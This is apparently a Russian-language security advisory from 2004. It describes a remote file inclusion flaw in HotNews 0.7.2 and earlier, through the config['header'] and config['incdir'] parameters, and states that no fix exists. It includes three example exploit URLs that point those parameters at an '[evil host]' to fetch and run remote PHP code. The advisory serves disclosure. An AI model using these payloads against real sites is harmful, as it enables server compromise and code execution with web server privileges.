Удаленное выполнение произвольного кода в HotNews

Дата публикации:
08.01.2004
Всего просмотров:
898
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
HotNews 0.x
Уязвимые версии: HotNews 0.7.2 и более ранние версии

Описание: Уязвимость включения файлов обнаружена в HotNews. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Уязвимость обнаружена в 'config["header"]' переменной в 'hotnews-engine.inc.php3' файле и в 'config["incdir"]' переменной в 'hnmain.inc.php3' файле. В результате удаленный пользователь может включить произвольный удаленный файл, который будет включен и выполнен на целевой системе с привилегиями Web сервера.

Пример/Эксплоит:

http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evi l host]/func.inc.php3

http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3

http://[victim]/includes/hotnews-engine.inc.p hp3?config[header]=http://[evil host]/[evil file]

URL производителя: http://sourceforge.net/projects/hotnews/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: HotNews arbitary file inclusion

или введите имя

CAPTCHA